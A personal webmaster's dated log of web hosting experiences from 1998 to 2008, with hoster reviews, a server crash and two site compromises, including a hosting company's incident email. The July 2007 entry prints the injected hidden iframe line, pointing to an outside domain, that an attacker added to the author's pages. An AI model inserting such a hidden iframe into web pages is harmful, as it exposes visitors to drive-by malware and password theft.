|
March 18, 2008: Hacked again.
This time it was a malicious script uploaded by another user. See the response from my ISP:
| |
Your shared hosting server had a user that unknowingly uploaded an
exploitable script. It was a postnuke (blogging system) module called
gallery. Though CWI provides industry leading security for shared
hosting and locks the server down as best as possible while still being
flexible to the needs of its users, resources are still shared. For
this reason, one user uploading an exploitable script, is like opening a
back door to the server, giving an unknown person the keys.
This was a
low risk attack as it was caught within 10 minutes and are usually used
to run simple scripts that are more of an annoyance then anything else.
To be sure, we have reinstalled items on the server to make sure nothing
was left altered on the system, and have suspended the account that
started the incident so that we can make other arrangements for them.
We are also working on a script that can detect and remove .bad. files
and out of date script versions uploaded by actual server users.
To fix
your site, you simply need to replace your index file, at this time it
seems like no other files were affected. If you need further
assistance, please let us know. Thank you for your understanding.
Sincerely,
Jason A. Taylor
Chief Technical Officer
CWI Hosting.com
| |
Yes, they caught it in 10 minutes, but CWI hosting never did the
courtesy of sending me an e-mail that this had happened (thanks!),
so I found out five days later when a friend let me know that my home page
had been hacked.
July 2007: Willus.com hacked!
On July 24, 2007, I discovered that
several of my HTML files on willus.com had been altered the night
before. Somebody had gained FTP access to my site and added lines like
this to my HTML files:
<!-- o4 --><iframe
src="http://t.fala.org.ua/" width=1 height=1
style="display:none"><!-- c4 -->
The .ua
country code is Ukraine. After contacting tech support at CWI hosting,
I was informed that the attack was coming from Hong Kong and that
they'd seen this before. The tech suggested that I may have FTP'd to my
site from a compromised PC that captured my password and sent it to the
machine in Hong Kong. I immediately changed my password and now
only FTP to my machine using secure FTP (using psftp.exe from the putty package). I also wrote a program to fix my infected
HTML files. Apparently the extra line in the infected files causes
vulnerable versions of Internet Explorer to infect PCs with the program
that captures the passwords, and this would be how the thing spreads.
That's my guess, anyway. Searching the web didn't yield much. Near as
I can tell, this is related to the Trojan-Downloader.Win32.Small.evh
virus, but I can't tell for sure. If anybody else has seen something
like this, I'd appreciate an e-mail. This one really surprised me. It
is the first time I've clearly had a password taken from right
underneath my nose.
July 2005: CWI-Hosting Review--still doing well
The aftermath of the server crash was somewhat trying. I had to open
several trouble tickets with CWI to get privileges that I had on the
server before it crashed. For example, they set me up in a restricted,
"jail shell" with no access to gcc.
I could understand that they wanted to have
a secure system, but they tried to deny me services that their web page
clearly advertises as being part of my plan.
After eventually corresponding with the
head of CWI's tech department (who was very pleasant), I had my
full privileges restored.
Since then, I've had no issues. On the plus side, CWI has steadily
been increasing my plan's disk storage quota. It is now over 1 GB,
which gives me plenty of room and is hard to beat for the price I'm
paying ($175/yr).
March 2005: CWI-Hosting server crash
Server crash. The server that CWI was using to host willus.com crashed
this month, and the dust is still settling. The server has been
very sluggish ever since coming back up on 3-21. Read here for more details.
February 2005: CWI-Hosting doing well
After over one year with CWI
Hosting, I have no regrets. My web site has been up every time I've
needed it, and they gave me all the features that were promised on
their web site, though I had to make more than one request to get
access to gcc so that I could compile my own CGI codes for my web
page. In general, the CWI support center has been very responsive.
November 2003: A poor review for Prentice-Internet
I no longer use
Prentice Internet for
my web hosting. I am now using
CWI Hosting
(starter plan, $17.50/mo). Prentice had a history of doing things
to my account unannounced (like resetting my password) and then
apologizing after the fact rather than giving me any warning ahead of time.
In the latest
incident, just last month, they deleted an important file of
mine while running e-mail tests on my account without my knowledge
or permission.
Though I believe it was not done maliciously (they were trying to figure
out an e-mail problem I was having), it was still an important file.
What made things much worse, however, was
when I repeatedly e-mailed Prentice asking them to restore the file,
and they would not
respond in any way. They don't seem to be answering any of my e-mails anymore.
Though at times Prentice has shown me excellent service, there
have been too many occasions like I have just described, and this
last case finally inspired me to look for a new hoster.
CWI Hosting has a polished web site and so far (two weeks of service)
they have quickly responded to questions I've had.
The transition
has been painless.
March 2001: Useful links
Here are two useful sites for understanding
how internet numbers and addresses are assigned:
ICANN (Internet Corporation for
Assigned Names and Numbers) and ARIN
(American Registry for Internet Numbers). Also, you can go
to Netcraft.com to get
information about a web site (what platform it is running and how
is hosting it).
July 2000: Cable modem is great.
I've now been using cable modem for about
six months ($47/mo including rental of the modem). I will never go back
to dial-up. Cable modem (and DSL, I suspect) is so much nicer. It
doesn't tie up your phone, there is no waiting for a connection, no busy
signal, and it's fast (typical 100-400Kbytes/s downloads). My website
service is still provided by
Prentice.
They've done an excellent job
and have virtually never had down time that I've been aware of. And
they are still $17/mo for 300 MB of disk space. That's
very hard to beat.
October 1998: The search for a hoster
I run my web site from home. It run it solely to share information and have some fun.
I started by checking to see if the domain name I wanted (willus.com)
had been taken.
You can get information on domain names by going
to internic.net and entering
the domain name.
Registering a domain name with Internic
is $70 for the first two years and $35/year
thereafter. But to register, you'll need a web hosting service.
Update 8/00: The Internet Corporation for Assigned Names and Numbers
(ICANN)
has now set it up so that you may now choose from any of
several "accredited
registrars" who can set up your domain name. This, in effect, has
commercialized this part of the Internet business, which is driving
the registration fee down a bit. I recently re-registered through
my service provider (Prentice)
for $20/year.
Web hosting services provide you with the internet
IP number for your domain name and an account on a computer
where you can store your web pages. Some also provide you with
a dial-up connection, but usually you have to get that separately.
For example, I use
Prentice-Internet for
my web hosting and Cox Cable for
my connection (cable modem).
There are literally hundreds of web hosters to choose from.
I found budgetweb.com
to be a great source of information on web hosting services. They have
a comprehensive list of features for hundreds of web hosters. Selecting
from this list, I first tried
smarthosting.com, but ended up
transfering to
Prentice
because they had more exactly what I wanted, but both are good
services that give you about 300 MB for about $20-$25/month.
If you have any more questions about how I run my site, send an e-mail.
|
|
|